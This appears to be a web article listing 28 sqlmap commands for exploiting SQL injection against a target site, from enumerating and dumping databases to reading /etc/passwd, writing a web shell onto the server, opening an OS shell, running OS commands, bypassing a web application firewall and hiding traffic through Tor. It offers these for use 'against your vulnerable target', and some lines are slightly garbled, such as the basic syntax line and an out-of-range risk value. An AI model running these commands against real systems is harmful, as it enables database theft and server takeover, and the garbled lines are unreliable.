Top SQLMAP Commands For Exploitation of SQL Injection

Structured Query Language, which is better known as SQL, is the underlining common programming language that is understood by most database management systems. It provides a common way for application to access the data in the database by using a common set of commands the database can understand.

Enrich your career in Structured Query Language by enrolling in MindMajix’s Best SQL Training.

Attackers exploit these databases by making them output information that they should not be displaying. Sometimes this is as simple as the attacker asking for privileged information from the database management system. Other times, it is taking advantage of poor configurations by database administrators.

Also Read:

• From Reconnaissance to Covering Tracks – 5 Phases of Ethical Hacking
• A to Z – Web Vulnerabilities Index – OWASP Standard
• A to Z – Cyber Security Tools Collection

Attackers may also take advantage of a vulnerability in the database management system that allows the attacker to view or write privileged commands to and from the database.

SQLmap automates the process of detecting and exploiting SQL injection vulnerability and taking over of database servers. SQLmap comes with a detection engine, as well as a broad range of Penetration Testing (PT) features that range from DB fingerprinting to accessing the underlying file system and executing commands on the operating system via out-of-band connections.

The basic syntax to use SQLmap is:

sqlmap -u URL – – function

Below is the list of most useful important SQLMAP Commands which you can use against your vulnerable target:

1. GET Request

sqlmap -u http://example.com/page.php?id=1 --dbs

2. From File

sqlmap -r request.txt

3. Testing with pattern of URL’s

sqlmap -u http://example.com/page/*/view --dbs

4. POST Request

sqlmap -u http://example.com/login.php --data "username=admin&pass=admin&submit=submit" -p username

5. Using Cookies

sqlmap -u http://example.com/enter.php --cookie="PHPSESSID=45634b63g643f563456g4356g" -u http://example.com/index.php?id=1

6. Extract Databases (DB Enumeration)

sqlmap -u http://example.com/page.php?id=1 --dbs

7. Identify Current DB

sqlmap -u http://example.com/page.php?id=1 --current-db

8. Extract Tables

sqlmap -u http://example.com/page.php?id=1 -D database --tables

9. Extract Columns

sqlmap -u http://example.com/page.php?id=1 -D database -T table_name --columns

10. Dumping Data

sqlmap -u http://example.com/page.php?id=1 -D database -T table_name -C colum1,column2 --dump

11. Multithreading

sqlmap -u http://example.com/page.php?id=1 --dbs --threads 5

12. Null-Connection

sqlmap -u http://example.com/page.php?id=1 --dbs --null-connection

13. HTTP Persistent Connection

sqlmap -u http://example.com/page.php?id=1 --dbs --keep-alive

14. Output prediction

sqlmap -u http://example.com/page.php?id=1 -D database -T user -c users,password --dump --predict-output

15. Checking privileges

sqlmap -u http://example.com/page.php?id=1 --privileges

16. Reading Files from the server

sqlmap -u http://example.com/page.php?id=1 --file-read=/etc/passwd

17. Uploading Files/Shell

sqlmap -u http://example.com/page.php?id=1 --file-write=/root/shell.php --file-dest=/var/www/shell.php

18. SQL Shell

sqlmap -u http://example.com/page.php?id=1 --sql-shell

19. OS shell

sqlmap -u http://example.com/page.php?id=1 --os-shell

20. OS Command Exe without Shell Upload

sqlmap -u http://example.com/page.php?id=1 --os-cmd "uname -a"

21. Using Proxy

sqlmap --proxy="127.0.0.1:8080" -u http://example.com/page.php?id=1 --dbs

22. Using Proxy with Credentials

sqlmap -–proxy="127.0.0.1:8080" –-proxy-cred=username:password -u http://example.com/page.php?id=1

23. Crawling

sqlmap -u http://example.com/ --crawl=1

24. Exploitation in Verbose Mode

sqlmap -u http://example.com/page.php?id=1 -v 3

25. Bypassing WAF (Web Application Firewall)

sqlmap -u http://example.com/page.php?id=1 --tamper=apostrophemask

26. Scanning Key Based Authentication Page

sqlmap -u http://example.com/page.php?id=1 --auth-file=

27. To use default TOR Network

sqlmap -u http://example.com/page.php?id=1 --tor

28. Scanning with High Risk and Level

sqlmap -u http://example.com/page.php?id=1 --level=3 --risk=5

• Most Common Online Threats – Protecting Yourself from Digital Scams
• 10 Steps to Secure and Manage Your Passwords
• Gmail and Facebook Users Advised to Secure Their Accounts Immediately
• Pentagon’s Proactive Approach to Cybersecurity – Over 50,000 Vulnerability Reports Since 2016
• Windows Hardening – Key Points To Remember
• Top 10 Fundamental Questions for Network Security
• How to Remove x-powered-by in Apache/PHP for Enhanced Security
• 12 Point Checklist – PHP Security Best Practices
• Secure Programming Checklist – 2023 Compilation Guide
• The Ultimate Network Security Checklist – 2023 Complete Guide